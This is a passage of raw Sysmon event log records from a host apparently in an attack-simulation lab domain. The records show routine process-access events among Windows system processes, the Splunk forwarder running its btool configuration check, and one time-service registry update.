dows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002228Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.634{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002227Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.634{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002226Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.634{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002225Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.634{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002224Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.634{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002223Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.634{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-429C-6000-6200-000000009A01}4004C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002222Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.634{08A6967A-429C-6000-6100-000000009A01}33562920C:\Windows\system32\cmd.exe{08A6967A-429C-6000-6200-000000009A01}4004C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002221Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.641{08A6967A-429C-6000-6200-000000009A01}4004C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{08A6967A-429C-6000-6100-000000009A01}3356C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list replication_port --no-log 10341000x80000000000000002220Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.634{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-429C-6000-6100-000000009A01}3356C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002219Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.634{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002218Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.634{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002217Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.634{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002216Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.634{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002215Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.634{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002214Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.634{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002213Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.634{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002212Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.634{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002211Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.634{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002210Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.634{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-429C-6000-6100-000000009A01}3356C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002209Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.634{08A6967A-429A-6000-4F00-000000009A01}38802220C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{08A6967A-429C-6000-6100-000000009A01}3356C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18274|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002208Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.635{08A6967A-429C-6000-6100-000000009A01}3356C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-429A-6000-4F00-000000009A01}3880C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000002207Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.540{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-429C-6000-6000-000000009A01}4020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002206Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.525{08A6967A-429C-6000-6000-000000009A01}40202676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+116e675|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+f344c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000002205Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:48.368{08A6967A-4288-6000-1100-000000009A01}1192C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6ea76-0x893f9ad4) 10341000x80000000000000002204Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.337{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002203Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.337{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002202Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.337{08A6967A-4286-6000-0B00-000000009A01}852976C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002201Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.274{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-429C-6000-6000-000000009A01}4020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002200Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 